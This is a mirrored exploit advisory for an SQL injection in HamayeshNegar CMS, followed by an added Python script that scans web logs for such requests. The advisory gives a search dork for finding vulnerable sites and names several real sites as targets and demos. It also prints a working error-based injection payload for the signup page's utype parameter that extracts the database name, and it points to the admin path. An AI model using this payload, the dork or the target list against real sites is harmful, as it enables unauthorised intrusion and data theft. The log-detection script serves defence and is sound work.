Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090094

Below is a copy:

HamayeshNegar Cms >9.1.3 - SQL Injection
# # # # # # #
# Exploit Title: HamayeshNegar Cms >9.1.3 - SQL Injection
# Dork: intext:"  (       ) "
# Date: 13.09.2017
# Vendor Homepage: http://www.hamayeshnegar.com/
# Version: >9.1.3
# Tested on: WiN8_x64/WiN10_x64/KaLiLinuX_x64
# # # # # # #
# Exploit Author: ArashHC
# Author Web: http://t.me/CyberSoldiersST
# Author Social: @ArashHC
# # # # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
#
# Search the dork on Google, select your target
# My Target:
# http://veconf.com
# Append /users/signup.php?utype=user to the end of the URL
# The utype parameter has an SQLi bug
# To extract the database name:
# [Site]/users/signup.php?utype=user' and(select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by 2)b)--+
# 
# Admin Page:
#  [Site]/admin/
#
# To find targets:
#  dork: intext:"  (       ) "
#  site: http://www.hamayeshnegar.com/counter.php
# Demos:
#  http://veconf.com
#  http://wse1.ir
#  http://contas96.ir
# # # # # # #
#
# Thanks to : EreBus, RexProg, JohnGH, AVENGER, ViRuS007, BlackWolfIran, LM7RIX, AliCyber, </ZED>, Agent W, AnonyCoder, Sarbaz Vatan, unknown0707, FarsProg
#
# https://t.me/CyberSoldiersST
#
# Discovered By: ArashHC
#
# # # # # # #
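
On the defender's side, requests of the kind described above leave a recognisable trace in web server access logs. The following is an added example, not part of the original advisory or of the vendor's code; the combined log format, the constructed sample lines and the rule that legitimate `utype` values are short alphanumeric tokens are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate utype values are short alphanumeric tokens such as "user".
SAFE_UTYPE = re.compile(r"[A-Za-z0-9_]{1,32}")
# Tokens typical of the error-based payload quoted in the advisory.
SQL_MARKERS = re.compile(r"'|--|\b(select|concat|information_schema|rand|group\s+by)\b", re.I)
# Client IP, request target and status code from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def suspicious_signup_requests(log_lines):
    """Return (client_ip, status, utype, reason) for suspect requests to signup.php."""
    findings = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/users/signup.php"):
            continue
        # parse_qs URL-decodes values, so %27 and + are seen as ' and space.
        for value in parse_qs(url.query, keep_blank_values=True).get("utype", []):
            if SQL_MARKERS.search(value):
                reason = "sql-marker"
            elif not SAFE_UTYPE.fullmatch(value):
                reason = "unexpected-format"
            else:
                continue
            findings.append((ip, int(status), value, reason))
    return findings

# Constructed sample log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Sep/2017:10:01:02 +0000] "GET /users/signup.php?utype=user HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Sep/2017:10:02:11 +0000] "GET /users/signup.php?utype=user%27%20and(select%201%20from%20information_schema.tables)--+ HTTP/1.1" 500 312',
    '203.0.113.9 - - [13/Sep/2017:10:02:40 +0000] "GET /users/signup.php?utype=../x HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Sep/2017:10:03:00 +0000] "GET /index.php?utype=user%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in suspicious_signup_requests(SAMPLE_LOG):
        print(finding)
```

A 500 status next to a `sql-marker` hit is worth prioritising, since error-based injection relies on the database error reaching the response.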
